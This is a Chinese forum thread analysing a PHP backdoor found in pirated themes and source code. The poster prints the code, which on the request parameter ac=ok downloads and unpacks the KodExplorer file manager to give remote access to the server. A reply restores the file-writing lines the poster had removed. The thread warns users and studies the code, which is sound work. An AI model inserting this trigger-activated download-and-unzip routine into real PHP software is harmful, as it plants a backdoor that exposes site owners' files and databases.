分析一段PHP的后门代码，很恶心

xiaoma9624

给大家分析一个简单的可以自己发现的PHP后门代码，这段代码存在与好多破解主题与源码中，我自己就至少发现了四五种。包括本站有人分享的源码中，也有这种代码。具体自己看下吧！
由于上次发帖子违规，现在需要爱心值消除违规，在看完我的分析之后能不能给个热心呢？谢谢大家了。这个帖子应该没有违规吧！如有违规请告知。谢谢！
我再重申一遍，代码做了修改，为了防小人，大家知道代码原理就行了，非要自己弄到完整的要放到自己源码里坑人？还有这个代码不是可道云里面的。官方的可道云没有问题，没看明白的就再看一遍。不知道哪位热心的网友把帖子转到了QQ安全管家的论坛了，安全管家的工作人员已经和我要走了原始样本分析了，如果还有什么新的情况会在这里说明。


我分享代码是为了叫大家了解他的工作原理，提高警惕的。修改代码是不希望有的人直接拿去放到自己源码里面。因为有这种人，所以我修改了源码。所以不要再纠结这段代码能不能运行了！好不好！也希望大家有能力补全的自己留着就好，别发出来。
还是那句话，防小人，防小人，防小人


正文开始


先上代码

[PHP] 纯文本查看 复制代码

?

01 02 03 04 05 06 07 08 09 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60

if($_GET['ac']=="ok"){        echo 'OK';     function downFile($url,$path){         $arr=parse_url($url);         $fileName=basename($arr['path']);         $file=file_get_contents($url);     }     downFile("这里是网络下载地址，防止小人，直接删除这里的连接");           class Unzip{         public function __construct(){             header("content-type:text/html;charset=utf8");         }         public function unzip($src_file, $dest_dir=false, $create_zip_name_dir=true, $overwrite=true){             if ($zip = zip_open($src_file)){                 if ($zip){                     $splitter = ($create_zip_name_dir === true) ? "." : "/";                     if($dest_dir === false){                                             }                     $this->create_dirs($dest_dir);                     while ($zip_entry = zip_read($zip)){                         $pos_last_slash = strrpos(zip_entry_name($zip_entry), "/");                         if ($pos_last_slash !== false){                             $this->create_dirs($dest_dir.substr(zip_entry_name($zip_entry), 0, $pos_last_slash+1));                         }                         if (zip_entry_open($zip,$zip_entry,"r")){                             $file_name = $dest_dir.zip_entry_name($zip_entry);                                 if ($overwrite === true || $overwrite === false && !is_file($file_name)){                                     $fstream = zip_entry_read($zip_entry, zip_entry_filesize($zip_entry));                                                                                                             }                             zip_entry_close($zip_entry);                         }                     }                     zip_close($zip);                 }             }else{                 return false;             }             return true;         }         public function create_dirs($path){             if (!is_dir($path)){                 $directory_path = "";                 $directories = explode("/",$path);                 array_pop($directories);                 foreach($directories as $directory){                     $directory_path .= $directory."/";                     if (!is_dir($directory_path)){                         mkdir($directory_path);                         chmod($directory_path, 0777);                     }                 }             }         }     }     $z = new Unzip();     $z->unzip("kodexplorer4.39.zip",'./', true, false); }

            以上代码是我发现的后门里面最简单的也是最贱的一个代码，当收到GET请求ac=ok时。会自动的下载kodexplorer4.39.zip，对你没看错，就是这货可道云。知道可道云的自然是知道这个代码是怎么工作的了。不知道的我给大家简单的解释一下吧，可道云是一个私有云系统，运行在虚拟主机和服务器下。当下载解压完之后这货就成了你的服务器后门。别人可以通过可道云查看你的服务器内容。可以下载你服务器的文件，并且连接数据库修改数据。


            是不是很简答？是不是很恶心？你杀毒都查不出这些东西！所以大家使用盗版的时候注意自己看下，中了招你都不知道怎么中的还以为是SQL注入修改的数据库。下面上图大家自己看一下吧。本地搭建的服务器写的代码测试的。大家有兴趣可以自己试试。


如果对你有用给个爱心啊，我要消除违规。还有奉劝那些知道后想做坏事的人啊，别干这么缺德的事。
由于怕有人拿走恶心人，代码修改了一部分，去掉了一些代码。想拿走给自己源码加后门的劝你们要点脸啊。

rickw

xiaoma9624 发表于 2019-5-22 21:22
没啥？你要自己验证代码么？

论坛里面是进行技术交流的。

贴了代码，也贴了分析说明。
代码贴和分析结论不一致，还没有任何说明，容易给其他学习者造成误导。
如果是隐藏了代码，在隐藏点写上备注说明，这样别人也不会被错误误导了。

为了便于大家交流讨论，我来尝试还原一下代码

[PHP] 纯文本查看 复制代码

?

01 02 03 04 05 06 07 08 09 10 11

function downFile($url,$path){         $arr=parse_url($url);         //这个地方是和url相关的，如果url不一样这个地方文件名获取的方式也不同         $fileName=basename($arr['path']);         $file=file_get_contents($url);         //数据写入文件         $fh = fopen($path . $fileName, 'wb');          fwrite($fh, $file);         fclose($fh);     }     downFile("这里是网络下载地址", "./" );

keymind

本站分享的哪些源码有这种后门？能透露一下让大家引起注意吗？

zhiyixs

感谢楼主分享经验

apian

真的很恶心的后门

xiaoma9624

看完的能不能给个热心值呢？热心值免费的！谢谢大家了

foxdog

举报了吗？。

包括本站有人分享的源码中，也有这种代码。

xiaoma9624

foxdog 发表于 2019-5-22 18:39
举报了吗？。

连接失效了就没管！

foxdog

xiaoma9624 发表于 2019-5-22 18:40
连接失效了就没管！

建议你说清楚，要不然感觉怪怪的

xiaoma9624

foxdog 发表于 2019-5-22 18:47
建议你说清楚，要不然感觉怪怪的

啥说清楚？代码都在上面呢还咋说清楚啊！

yc19951005

感谢楼主分享